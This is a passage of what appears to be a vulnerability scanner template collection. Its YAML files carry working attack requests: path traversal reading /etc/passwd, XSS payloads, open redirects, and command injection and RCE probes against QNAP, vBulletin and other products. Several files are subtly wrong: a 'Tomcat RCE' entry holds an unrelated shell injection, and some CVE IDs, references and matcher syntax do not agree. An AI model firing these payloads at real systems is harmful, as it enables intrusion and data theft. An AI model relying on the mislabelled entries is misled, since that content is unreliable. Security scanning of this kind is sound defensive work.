 8 |   tags: cve,cve2017,ulterius,traversal
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - "{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini"
14 |       - "{{BaseURL}}/.../.../.../.../.../.../.../.../.../etc/passwd"
15 | 
16 |     matchers-condition: and
17 |     matchers:
18 |       - type: status
19 |         status:
20 |           - 200
21 |       - type: regex
22 |         regex:
23 |           - "root:[x*]:0:0:"
24 |           - "\\[(font|extension|file)s\\]"
25 |         conditon: or
26 |         part: body
27 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-11034.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-11034
 2 | info:
 3 |   name: GLPI Open Redirect
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 |   
 9 | variables:
10 |   - endpoint: |
11 |       index.php
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}?redirect=/\/evil.com/
16 |       {{.root}}/{{.endpoint}}?redirect=//evil.com
17 |     headers:
18 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
19 |     detections:
20 |       - >-
21 |         RegexSearch("resHeaders", "(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?evil\.com(?:\s*?)$")
22 | 
23 | references:
24 |   - https://www.cvebase.com/cve/2020/11034
25 | 


--------------------------------------------------------------------------------
/nuclei_pocs/jetty-information-disclosure.yaml:
--------------------------------------------------------------------------------
 1 | id: jetty-information-disclosure
 2 | 
 3 | info:
 4 |   name: Jetty 9.4.37 & 9.4.38 Information Disclosure
 5 |   author: geeknik
 6 |   reference: http://www.securityspace.com/smysecure/catid.html?id=1.3.6.1.4.1.25623.1.0.117479
 7 |   severity: low
 8 |   tags: jetty
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - "{{BaseURL}}/context/%2e/WEB-INF/web.xml"
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: word
18 |         part: header
19 |         words:
20 |           - "application/xml"
21 |       - type: status
22 |         status:
23 |           - 200
24 |       - type: word
25 |         words:
26 |           - "<web-app>"
27 |           - "java.sun.com"
28 |         condition: and
29 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2018-11784.yaml:
--------------------------------------------------------------------------------
 1 | id: CVE-2018-11784
 2 | 
 3 | info:
 4 |   name: Apache Tomcat Open Redirect
 5 |   author: geeknik
 6 |   description: Apache Tomcat versions prior to 9.0.12, 8.5.34, and 7.0.91 are prone to an open-redirection vulnerability because it fails to properly sanitize user-supplied input.
 7 |   reference: https://lists.apache.org/thread.html/23134c9b5a23892a205dc140cdd8c9c0add233600f76b313dda6bd75@%3Cannounce.tomcat.apache.org%3E
 8 |   severity: medium
 9 |   tags: tomcat,redirect,cve,cve2018
10 | 
11 | requests:
12 |   - method: GET
13 |     path:
14 |       - "{{BaseURL}}//example.com"
15 | 
16 |     matchers:
17 |       - type: regex
18 |         regex:
19 |           - "(?m)^(L|l)ocation: (((http|https):)?//(www.)?)?example.com"
20 |         part: header
21 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2018-1247.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2018-1247
 2 | info:
 3 |   name: RSA Authentication Manager XSS
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       IMS-AA-IDP/common/scripts/iua/pmfso.swf
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}?sendUrl=/&gotoUrlLocal=javascript:alert(1337)//"  
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StringSearch("resHeaders", "application/x-shockwave-flash") && StringSearch("resBody", "javascript:alert(1337)")
21 | references:
22 |   - https://www.cvebase.com/cve/2018/1247
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2018-5230.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2018-5230
 2 | info:
 3 |   name: Atlassian Confluence XSS
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: "{{.BaseURL}}"
 8 | 
 9 | replicate:
10 |   prefixes: 'jira, wiki, confluence'
11 | 
12 | requests:
13 |   - method: GET
14 |     redirect: false
15 |     url: >-
16 |      {{.root}}/pages/includes/status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%281337%29%22%3E.vm
17 |     headers:
18 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
19 |     detections:
20 |       - >-
21 |         StatusCode() == 200 && StringSearch('response', 'javascript:alert(1337)') && StringSearch('response', 'LowestInnerExceptionMessage')
22 | 
23 | references:
24 |   - https://www.cvebase.com/cve/2018/5230
25 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-8091.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-8091
 2 | info:
 3 |   name: TYPO3 XSS
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 |   
 9 | variables:
10 |   - endpoint: |
11 |       /typo3/contrib/websvg/svg.swf
12 | 
13 | requests: 
14 |   - method: GET
15 |     url: >-
16 |       {{.root}}/{{.endpoint}}?uniqueId=%22])}catch(e){if(!this.x)alert(31337),this.x=1}//
17 |     headers:
18 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
19 |     detections:
20 |       - >-
21 |         StatusCode() == 200 && StringSearch("resBody", "31337") && StringSearch("resHeaders", "application/x-shockwave-flash")
22 | 
23 | references:
24 |   - https://www.cvebase.com/cve/2020/8091
25 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-8982.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-8982
 2 | info:
 3 |   name: Citrix ShareFile Path Traversal
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 |   
 9 | variables:
10 | requests: 
11 |   - method: GET
12 |     url: >-
13 |       {{.root}}/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri
14 |     headers:
15 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
16 |     detections:
17 |       - >-
18 |         StatusCode() == 200 && StringSearch("resBody", "bit app support") && StringSearch("resBody", "fonts") && StringSearch("resBody", "extensions")
19 | 
20 | references:
21 |   - https://www.cvebase.com/cve/2020/8982
22 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2021-26475.yaml:
--------------------------------------------------------------------------------
 1 | id: CVE-2021-26475
 2 | 
 3 | info:
 4 |   name: EPrints 3.4.2 XSS
 5 |   author: geeknik
 6 |   description: EPrints 3.4.2 exposes a reflected XSS opportunity in the via a cgi/cal URI.
 7 |   reference: https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf
 8 |   severity: medium
 9 |   tags: cve,cve2021,xss,eprints
10 | 
11 | requests:
12 |   - method: GET
13 |     path:
14 |       - "{{BaseURL}}/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%27{{randstr}}%27)%3C/script%3E"
15 | 
16 |     matchers-condition: and
17 |     matchers:
18 |       - type: word
19 |         words:
20 |           - "</title><script>alert('{{randstr}}')</script>"
21 |       - type: word
22 |         part: header
23 |         words:
24 |           - "text/html"
25 | 


--------------------------------------------------------------------------------
/nuclei_pocs/avtech-dvr-exposure.yaml:
--------------------------------------------------------------------------------
 1 | id: avtech-dvr-exposure
 2 | 
 3 | info:
 4 |   name: Avtech AVC798HA DVR Information Exposure
 5 |   description: Under the /cgi-bin/nobody folder every CGI script can be accessed without authentication.
 6 |   reference: http://www.avtech.com.tw/
 7 |   author: geeknik
 8 |   severity: low
 9 |   tags: dvr,exposure,avtech
10 | 
11 | requests:
12 |   - method: GET
13 |     path:
14 |       - "{{BaseURL}}/cgi-bin/nobody/Machine.cgi?action=get_capability"
15 | 
16 |     matchers-condition: and
17 |     matchers:
18 |       - type: status
19 |         status:
20 |           - 200
21 |       - type: word
22 |         words:
23 |           - "Firmware.Version="
24 |           - "MACAddress="
25 |           - "Product.Type="
26 |         condition: and
27 | 


--------------------------------------------------------------------------------
/nuclei_pocs/zwave2mqtt-health-check.yaml:
--------------------------------------------------------------------------------
 1 | id: zwave2mqtt-health-check
 2 | 
 3 | info:
 4 |   name: Zwave2MQTT Health Check
 5 |   reference:
 6 |     - https://github.com/OpenZWave/Zwave2Mqtt#health-check-endpoints
 7 |   author: geeknik
 8 |   severity: info
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - "{{BaseURL}}/health/mqtt"
14 |       - "{{BaseURL}}/health/zwave"
15 |     headers:
16 |       Accept: "text/plain"
17 | 
18 |     matchers-condition: and
19 |     matchers:
20 |       - type: status
21 |         status:
22 |           - 200
23 |           - 500
24 |         condition: or
25 |       - type: word
26 |         part: header
27 |         words:
28 |           - "text/plain"
29 |       - type: dsl
30 |         dsl:
31 |           - "len(body) < 1"
32 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2017-7391.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2017-7391
 2 | info:
 3 |   name: Magento MAGMI XSS
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       magmi/web/ajax_gettime.php
12 | requests:
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}?prefix=%22%3E%3Cscript%3Ealert("cvebase");%3C/script%3E%3C
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && StringSearch("resBody", '"><script>alert(document.domain);</script><') && StringSearch("resHeaders", 'text/html')
21 | references:
22 |   - https://www.cvebase.com/cve/2017/7391
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2018-1000129.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2018-1000129
 2 | info:
 3 |   name: Jolokia XSS
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - vul: |
11 |       /jolokia/
12 |       /monitoring/json/
13 | 
14 | requests:
15 |   - method: GET
16 |     redirect: false
17 |     url: >-
18 |       {{.root}}{{.vul}}read<svg%20onload=alert(document.domain)>?mimeType=text/html
19 |     headers:
20 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
21 |     detections:
22 |       - >-
23 |         StatusCode() == 200 && StringSearch("resHeaders", 'Content-Type: text/html') && StringSearch("body", '<svg onload=alert(document.domain)>')
24 | 
25 | references:
26 |   - https://www.cvebase.com/cve/2018/1000129
27 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2018-18069.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2018-18069
 2 | info:
 3 |   name: Wordpress Stored XSS
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       wp-admin/admin.php
12 | requests: 
13 |   - method: POST
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     body: |
19 |       icl_post_action=save_theme_localization&locale_file_name_en=EN\"><html xmlns=\"hacked
20 |     detections:
21 |       - >-
22 |         StatusCode() == 302 && StringSearch("resHeaders", "_icl_current_admin_language") 
23 | references:
24 |   - https://www.cvebase.com/cve/2018/18069
25 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2019-8451.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2019-8451
 2 | info:
 3 |   name: Jira SSRF
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       plugins/servlet/gadgets/makeRequest
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}?url=https://{{.Host}}:1337@example.com
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |       - X-Atlassian-token: no-check
19 |     detections:
20 |       - >-
21 |         StatusCode() == 200 && StringSearch("resBody", '<p>This domain is for use in illustrative examples in documents.')
22 | references:
23 |   - https://www.cvebase.com/cve/2019/8451
24 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-14179.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-14179
 2 | info:
 3 |   name: Jira Information Leak
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 |   
 9 | variables:
10 |   - endpoint: |
11 |       secure/QueryComponent
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}!Default.jspa
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |       - Referer: "{{.root}}/webadmin/admin/service_manager_data.php"
19 |     detections:
20 |       - >-
21 |         StatusCode() == 200 && (StringSearch("resBody", "searchers") || StringSearch("resBody", "groups"))
22 | 
23 | references:
24 |   - https://www.cvebase.com/cve/2020/14179
25 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-8209.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-8209
 2 | info:
 3 |   name: Xenmobile LFI CVE-2020-8209
 4 |   risk: High
 5 | 
 6 | 
 7 | params:
 8 |   - root: '{{.BaseURL}}'
 9 | 
10 | variables:
11 |   - file: |
12 |       ../../../../../etc/passwd
13 |       ../../../../../c:/windows/win.ini
14 | requests:
15 |   - method: GET
16 |     redirect: false
17 |     url: >-
18 |       {{.root}}/jsp/help-sb-download.jsp?sbFileName={{.file}}
19 |     headers:
20 |     detections:
21 |       - >-
22 |         StringSearch("response", "root:") && StringSearch("response", "/bin/bash")
23 |       - >-
24 |         StatusCode() == 200 && StringSearch("body", "[extensions]") && StringSearch("body", "[fonts]")
25 | references:
26 |   - link: https://twitter.com/ptswarm/status/1328346259502018560/photo/1
27 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2017-6361.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2017-6361
 2 | info:
 3 |   name: QNAP QTS RCE
 4 |   risk: Critical
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       cgi-bin/authLogin.cgi
12 | requests:
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}?reboot_notice_msg=$(printf "QNAPVJBD%08d%16s  14`(echo;cat%20/etc/passwd)>&2`" $(expr $(date +%s) % 100000000) Disconnect|base64|tr -d "\r\n")
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:") 
21 | references:
22 |   - https://www.cvebase.com/cve/2017/6360
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2018-1271.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2018-1271
 2 | info:
 3 |   name: Spring MVC Path Traversal
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       static/
12 |       spring-mvc-showcase/resources/
13 | requests: 
14 |   - method: GET
15 |     url: >-
16 |       {{.root}}/{{.endpoint}}%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
17 |     headers:
18 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
19 |     detections:
20 |       - >-
21 |         StatusCode() == 200 && StringSearch("resBody", "for 16-bit app support")
22 | references:
23 |   - https://www.cvebase.com/cve/2018/1271
24 | 


--------------------------------------------------------------------------------
/nuclei_pocs/config-file.yaml:
--------------------------------------------------------------------------------
 1 | id: config-file
 2 | 
 3 | info:
 4 |   name: Detect Config File
 5 |   author: geeknik
 6 |   severity: high
 7 |   tags: config,auth,api
 8 | 
 9 | requests:
10 |   - method: GET
11 |     path:
12 |       - "{{BaseURL}}/config/default.json"
13 |       - "{{BaseURL}}/config.json"
14 |       - "{{BaseURL}}/config/config.json"
15 |       - "{{BaseURL}}/credentials/config.json"
16 | 
17 |     matchers-condition: and
18 |     matchers:
19 |       - type: word
20 |         words:
21 |           - '"api_keys":'
22 |           - '"accessKey":'
23 |           - '"secretKey":'
24 |         condition: or
25 |       - type: status
26 |         status:
27 |           - 200
28 |       - type: word
29 |         words:
30 |           - "application/json"
31 |         part: header
32 | 


--------------------------------------------------------------------------------
/nuclei_pocs/django-secret.key.yaml:
--------------------------------------------------------------------------------
 1 | id: django-secret-key
 2 | 
 3 | info:
 4 |   name: Django Secret Key
 5 |   author: geeknik
 6 |   severity: high
 7 |   tags: django
 8 | 
 9 | requests:
10 |   - method: GET
11 |     path:
12 |       - "{{BaseURL}}/settings.py"
13 |       - "{{BaseURL}}/app/settings.py"
14 |       - "{{BaseURL}}/django/settings.py"
15 |       - "{{BaseURL}}/settings/settings.py"
16 |       - "{{BaseURL}}/web/settings/settings.py"
17 | 
18 |     matchers-condition: and
19 |     matchers:
20 |       - type: status
21 |         status:
22 |           - 200
23 |       - type: word
24 |         part: body
25 |         words:
26 |           - "SECRET_KEY ="
27 |       - type: word
28 |         part: header
29 |         words:
30 |           - "text/html"
31 |         negative: true
32 | 


--------------------------------------------------------------------------------
/nuclei_pocs/netdata-unauth.yaml:
--------------------------------------------------------------------------------
 1 | id: netdata-unauth
 2 | info:
 3 |   name: Netdata Unauth
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | requests:
10 |   - method: GET
11 |     redirect: false
12 |     url: >-
13 |       {{.root}}/api/v1/data?chart=system.cpu&format=json&points=125&group=average&gtime=0&options=ms%7Cflip%7Cjsonwrap%7Cnonzero&after=-120&dimensions=iowait
14 |     headers:
15 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
16 |     detections:
17 |       - >-
18 |         StatusCode() == 200 && && StringSearch("resHeaders", "application/json") && StringSearch("response", "view_update_every") && StringSearch("response", "dimensions")
19 | 
20 | references:
21 |   - repo: https://github.com/netdata/netdata


--------------------------------------------------------------------------------
/nuclei_pocs/robomongo.yaml:
--------------------------------------------------------------------------------
 1 | id: robomongo
 2 | 
 3 | info:
 4 |   name: Detect robomongo.json
 5 |   author: geeknik
 6 |   description: MongoDB credentials file used by RoboMongo
 7 |   severity: high
 8 |   tags: mongodb,robomongo,auth
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - "{{BaseURL}}/db/robomongo.json"
14 |       - "{{BaseURL}}/robomongo.json"
15 | 
16 |     matchers-condition: and
17 |     matchers:
18 |       - type: word
19 |         part: header
20 |         words:
21 |           - "application/json"
22 |       - type: word
23 |         words:
24 |           - "databaseName"
25 |           - "userName"
26 |           - "userPassword"
27 |           - "serverHost"
28 |         condition: and
29 |       - type: status
30 |         status:
31 |           - 200
32 | 


--------------------------------------------------------------------------------
/nuclei_pocs/wp-ambience-xss.yaml:
--------------------------------------------------------------------------------
 1 | id: wp-ambience-xss
 2 | 
 3 | info:
 4 |   name: WordPress Theme Ambience - 'src' Reflected Cross-Site Scripting (XSS)
 5 |   author: daffainfo
 6 |   severity: medium
 7 |   reference: https://www.exploit-db.com/exploits/38568
 8 |   tags: wordpress,xss,wp-plugin
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - '{{BaseURL}}/wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg'
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: word
18 |         words:
19 |           - "<body onload=alert(1)>"
20 |         part: body
21 | 
22 |       - type: word
23 |         part: header
24 |         words:
25 |           - text/html
26 | 
27 |       - type: status
28 |         status:
29 |           - 200
30 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2012-4242.yaml:
--------------------------------------------------------------------------------
 1 | id: CVE-2012-4242
 2 | 
 3 | info:
 4 |   name: WordPress Plugin MF Gig Calendar 0.9.2 - Reflected Cross-Site Scripting (XSS)
 5 |   author: daffainfo
 6 |   severity: medium
 7 |   reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4242
 8 |   tags: cve,cve2012,wordpress,xss,wp-plugin
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - '{{BaseURL}}/?page_id=2&%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: word
18 |         words:
19 |           - "<script>alert(123)</script>"
20 |         part: body
21 | 
22 |       - type: word
23 |         part: header
24 |         words:
25 |           - text/html
26 | 
27 |       - type: status
28 |         status:
29 |           - 200
30 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2017-7529.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2017-7529
 2 | info:
 3 |   name: Nginx Remote Integer Overflow
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 | requests:
11 |   - method: GET
12 |     url: >-
13 |       {{.root}}/
14 |     headers:
15 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
16 |       - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
17 |       - Range: bytes=-17208,-9223372036854758792
18 | 
19 |     detections:
20 |       - >-
21 |         StatusCode() == 206 && StringSearch("resHeaders", "Server: nginx") && StringSearch("resBody", "Content-Range")
22 | references:
23 |   - https://www.cvebase.com/cve/2017/7529
24 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2018-19439.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2018-19349
 2 | info:
 3 |   name: Oracle SGD XSS
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}?=&windowTitle=AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--&>helpFile=concepts.html
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StringSearch("resBody", "<script>alert(1337)</script><!--</TITLE>") 
21 | references:
22 |   - https://www.cvebase.com/cve/2018/19439
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2018-6389.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2018-6389
 2 | info:
 3 |   name: Wordpress DoS
 4 |   risk: Low
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 |   
 9 | variables:
10 |   - endpoint: |
11 |       wp-admin/load-scripts.php
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}?load=
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && StringSearch("resHeaders", "x_powered_by") && StringSearch("resHeaders", "Engine") && StringSearch("resHeaders", "content_type") && StringSearch("resHeaders", "javascript")
21 | 
22 | references:
23 |   - https://www.cvebase.com/cve/2018/6389
24 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2019-14322.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2019-14322
 2 | info:
 3 |   name: Pallets Werkzeug Path Traversal
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       base_import/
12 |       web/
13 |       base/
14 | requests: 
15 |   - method: GET
16 |     url: >-
17 |       {{.root}}/{{.endpoint}}static/c:/windows/win.ini
18 |     headers:
19 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
20 |     detections:
21 |       - >-
22 |         StatusCode() == 200 && (StringSearch("resBody", "bit app support") && StringSearch("resBody", "fonts") && StringSearch("resBody", "extensions"))
23 | references:
24 |   - https://www.cvebase.com/cve/2019/14322
25 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2019-16759.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2019-16759
 2 | info:
 3 |   name: vBulletin RCE
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: "{{.BaseURL}}"
 8 | 
 9 | requests:
10 |   - method: POST
11 |     redirect: false
12 |     url: >-
13 |       {{.root}}/
14 |     headers:
15 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
16 |       - Content-Type: application/x-www-form-urlencoded
17 |     body: |
18 |       routestring=ajax/render/widget_php&widgetConfig%5bcode%5d=phpinfo()%3bexit%3b
19 |     detections:
20 |       - >-
21 |         StatusCode() == 200 && StringSearch('body', 'PHP Version') && StringSearch('body', 'Build Date') && !StringSearch('body', 'Citrix Login')
22 | 
23 | references:
24 |   - https://www.cvebase.com/cve/2019/16759
25 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-16139.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-16139
 2 | info:
 3 |   name: Cisco DoS
 4 |   risk: Low
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 |   
 9 | variables:
10 |   - endpoint: |
11 |       localmenus.cgi
12 | requests: 
13 |   - method: POST
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && StringSearch("resBody", "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA") && StringSearch("resHeaders", "application/xml")
21 | 
22 | references:
23 |   - https://www.cvebase.com/cve/2020/16139
24 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-24550.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-24550
 2 | info:
 3 |   name: EpiServer Open Redirect (CVE-2020-24550)
 4 |   risk: Low
 5 | 
 6 | params:
 7 |   - root: "{{.BaseURL}}"
 8 |   - dest: "bing.com"
 9 | 
10 | requests:
11 |   - method: GET
12 |     url: >-
13 |       {{.root}}/find_v2/_click/?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://{{.dest}}
14 |     headers:
15 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
16 |     detections:
17 |       - >-
18 |         (StatusCode() >= 300 && StatusCode() < 400) && (StringSearch("resHeaders", "Location: http://{{.dest}}") || StringSearch("resHeaders", "Location: https://{{.dest}}"))
19 | 
20 | references:
21 |   - link: 'https://labs.nettitude.com/blog/cve-2020-24550-open-redirect-in-episerver-find/'


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-9484.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-9484
 2 | info:
 3 |   name: Apache Tomcat RCE
 4 |   risk: Critical
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 |   
 9 | requests: 
10 |   - method: GET
11 |     url: >-
12 |       {{.root}}/cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd
13 |     headers:
14 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
